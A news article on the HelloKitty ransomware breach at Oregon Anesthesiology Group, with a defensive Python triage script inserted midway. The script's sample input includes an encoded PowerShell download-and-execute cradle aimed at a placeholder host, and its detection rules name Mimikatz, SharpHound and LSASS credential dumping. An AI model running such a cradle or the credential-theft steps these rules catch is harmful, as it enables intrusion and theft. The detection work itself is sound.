The Oregon Anesthesiology Group (OAG) said it suffered a ransomware attack in July that led to the breach of sensitive employee and patient information.
The breach involves the information of 750,000 patients and 522 current and former OAG employees.
In a statement, the company said it was contacted by the FBI on October 21. The FBI explained that it seized an account that contained OAG patient and employee files from HelloKitty, a Ukrainian ransomware group.
The FBI said it believes the group exploited a vulnerability in OAG’s third-party firewall, enabling the hackers to gain entry to the network.
“Patient information potentially involved in this incident included names, addresses, date(s) of service, diagnosis and procedure codes with descriptions, medical record numbers, insurance provider names, and insurance ID numbers,” OAG explained.
“The cybercriminals also potentially accessed current and former OAG employee data, including names, addresses, Social Security numbers and other details from W-2 forms on file.”
The July 11 attack locked OAG out of its servers and forced it to restore its systems from off-site backups and rebuild its IT infrastructure from the ground up. Outside cybersecurity experts were hired to help with the investigation into the attack.
“According to the cyber forensics report obtained by OAG in late November, the cybercriminals, once inside, were able to data-mine the administrator’s credentials and access OAG’s encrypted data,” OAG said.
The company has since replaced its third-party firewall and expanded the use of multifactor authentication. Victims of the incident are being provided with 12 months of Experian identity protection services and credit monitoring.
OAG added that victims should be on the lookout for scams and urged them to enroll in Experian’s IdentityWorks program, which comes with up to $1 million in identity theft insurance.
Those whose Social Security numbers were leaked are urged to create a my Social Security account with the Social Security Administration, which will allow them to claim their SSN, according to OAG.
ZDNet previously reported that the HelloKitty ransomware has been active since at least 2020 and mostly targets Windows systems, with some variants being used against Linux systems.
There have been a number of HelloKitty spinoffs, including a new unnamed ransomware variant and Vice Society.
The FBI sent out a warning about the group in October, noting that the group was becoming known for aggressively pressuring its victims with the double extortion technique.
“In some cases, if the victim does not respond quickly or does not pay the ransom, the threat actors will launch a Distributed Denial of Service (DDoS) attack on the victim company’s public facing website,” the FBI said. “Hello Kitty/FiveHands actors demand varying ransom payments in Bitcoin (BTC) that appear tailored to each victim, commensurate with their assessed ability to pay it. If no ransom is paid, the threat actors will post victim data to the Babuk site (payload.bin) or sell it to a third-party data broker.”
The FBI added that the group typically gains access through compromised credentials or known vulnerabilities in SonicWall products. Once inside the network, the actors use publicly available penetration-testing suites such as Cobalt Strike, Mandiant’s Commando, or PowerShell Empire, preloaded with publicly available tools like BloodHound and Mimikatz, to map the network and escalate privileges before exfiltration and encryption.
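The post-intrusion behaviour the FBI describes (PowerShell-based tooling, credential theft, Active Directory enumeration) leaves endpoint traces that a defender can triage. The script below is an added example written for this article, not code from OAG, the FBI, or any of the named projects. It runs a few detection rules over constructed, Sysmon-like events (event type 1 for process creation, 10 for process access; the field names `ts`, `event`, `user`, `image`, `cmdline` and `target` are assumed for the example), flagging encoded PowerShell download cradles, unexpected reads of LSASS memory, and well-known tool names on the command line. The encoded command and the `placeholder.invalid` domain are built inside the script purely as sample input.

```python
import base64
import re
from dataclasses import dataclass

# Constructed sample command for the encoded-PowerShell event below.
# PowerShell's -EncodedCommand takes base64 over UTF-16LE text; the
# domain is a placeholder, not a real indicator.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/stage')"
    .encode("utf-16le")).decode("ascii")

# Constructed events modelled loosely on Sysmon: 1 = process creation, 10 = process access.
SAMPLE_EVENTS = [
    # benign scheduled admin script
    {"ts": "2021-07-11T01:58:12Z", "event": 1, "user": "OAG\\admin",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\rotate-logs.ps1", "target": ""},
    # hidden, encoded download cradle: the shape Empire / Cobalt Strike stagers take
    {"ts": "2021-07-11T02:14:05Z", "event": 1, "user": "OAG\\svc-backup",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -EncodedCommand {_ENCODED}", "target": ""},
    # antivirus engine legitimately opening LSASS
    {"ts": "2021-07-11T02:15:00Z", "event": 10, "user": "NT AUTHORITY\\SYSTEM",
     "image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\MsMpEng.exe",
     "cmdline": "", "target": r"C:\Windows\System32\lsass.exe"},
    # unknown binary reading LSASS memory: the credential-dumping pattern Mimikatz relies on
    {"ts": "2021-07-11T02:16:41Z", "event": 10, "user": "OAG\\svc-backup",
     "image": r"C:\Users\Public\update.exe",
     "cmdline": "", "target": r"C:\Windows\System32\lsass.exe"},
    # AD enumeration collector named on its own command line
    {"ts": "2021-07-11T02:20:09Z", "event": 1, "user": "OAG\\svc-backup",
     "image": r"C:\Users\Public\SharpHound.exe",
     "cmdline": "SharpHound.exe -c All", "target": ""},
]

# Processes that legitimately touch LSASS on a typical Windows host (tune per environment).
LSASS_READERS_ALLOWED = {"msmpeng.exe", "csrss.exe", "wininit.exe", "services.exe", "lsm.exe"}
# Tool names that should never appear on a production command line.
TOOL_MARKERS = ("mimikatz", "sekurlsa", "sharphound", "bloodhound", "invoke-empire")
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{20,})")
# Download-and-execute primitives that make a decoded command a cradle.
CRADLE = re.compile(r"(?i)iex|invoke-expression|downloadstring|net\.webclient")


@dataclass
class Finding:
    ts: str
    rule: str
    detail: str


def decode_powershell(b64: str) -> str:
    """Decode an -EncodedCommand argument; returns '' if it is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(b64).decode("utf-16le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return ""


def triage(events) -> list:
    """Apply the three rules to a list of events and return Findings in event order."""
    findings = []
    for ev in events:
        image = ev["image"].rsplit("\\", 1)[-1].lower()
        cmd = ev.get("cmdline", "")
        if ev["event"] == 1:
            m = ENC_FLAG.search(cmd)
            if m and image.startswith("powershell"):
                decoded = decode_powershell(m.group(1))
                if CRADLE.search(decoded):
                    findings.append(Finding(ev["ts"], "encoded_download_cradle",
                                            f"{ev['user']}: {decoded[:60]}"))
            if any(t in cmd.lower() or t in image for t in TOOL_MARKERS):
                findings.append(Finding(ev["ts"], "known_tool_name", f"{ev['user']}: {image}"))
        elif ev["event"] == 10:
            target = ev["target"].rsplit("\\", 1)[-1].lower()
            if target == "lsass.exe" and image not in LSASS_READERS_ALLOWED:
                findings.append(Finding(ev["ts"], "lsass_access_unexpected",
                                        f"{ev['user']}: {ev['image']}"))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f.ts, f.rule, f.detail)
```

Run against the constructed events, the script reports three findings, all under the same `svc-backup` account: the encoded cradle, the LSASS read by an unsigned binary in a world-writable directory, and the enumeration tool. Correlating findings on one account within minutes is what turns three low-confidence signals into a credible credential-theft alert; the allow-list for LSASS readers is the part that needs tuning per environment to keep false positives from EDR and backup agents down.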
In February, the group was implicated in a headline-grabbing ransomware attack on Polish game developer CD Projekt Red, the maker of popular games like Cyberpunk 2077 and The Witcher series.